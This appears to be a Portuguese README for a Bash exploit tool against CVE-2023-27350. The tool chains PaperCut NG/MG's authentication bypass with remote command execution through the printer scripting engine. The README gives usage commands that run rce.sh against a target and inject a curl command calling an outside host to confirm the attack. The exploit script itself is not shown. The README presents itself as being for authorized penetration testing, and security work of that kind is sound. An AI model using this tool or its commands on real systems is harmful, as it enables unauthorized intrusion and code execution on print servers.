
Ferramenta de Exploração de Bypass de Autenticação e Execução Remota de Código (RCE) do PaperCut NG/MG. Uma implementação autônoma em Bash da cadeia de exploração do PaperCut, com suporte opcional a proxy, elevação automatizada de sessão e injeção dinâmica de comandos por meio do mecanismo de script de impressão. Projetada para auditoria de segurança e testes de penetração autorizados.

Um exploit Bash simplificado para CVE-2023-27350. Este script automatiza o bypass de autenticação, a preparação do ambiente e a injeção de comandos por meio do mecanismo de script da impressora PaperCut.


# Clone the repository
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# Enter the directory
cd CVE-2023-27350
# Make the script executable
chmod +x rce.sh
# Run the exploit (Example with Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : URL do alvo (por exemplo, http://10.129.x.x:9191)-c : Comando a executar (entre aspas)-x : (Opcional) URL do proxy (por exemplo, http://10.129.x.x:3128)